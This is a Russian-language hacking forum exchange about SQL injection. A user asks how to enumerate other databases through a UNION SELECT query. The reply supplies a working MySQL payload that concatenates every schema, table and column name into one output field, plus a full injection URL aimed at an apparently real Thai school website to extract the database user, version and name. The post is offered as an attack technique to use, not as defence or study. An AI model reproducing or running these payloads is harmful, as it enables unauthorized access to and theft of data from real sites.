|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от cipa21
что делаю не так?
Код:
13+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+limit+39,1--
Такой запрос выдает в один список всю базу information_schema и базу сайта.
Собственно вопрос! Каким запросом посмотреть соседние базы если юзер имеет к ним доступ? Попробуй в выводимое поле вставить такой шаблон:
Сообщение от None
(select(@x)from(select(@x:=0x00),(select(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2e,table_name, 0x3a,column_name))))x)
P.S: а вот и примерчик вставки такого блока.
Сообщение от None
http://www.school.net.th/schoolnet/article/read.php?article_id=-518+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5,6,7,8,9,10,1111,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,(select(@x) from(select(@x:=0x00),(select(0)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135+--+
|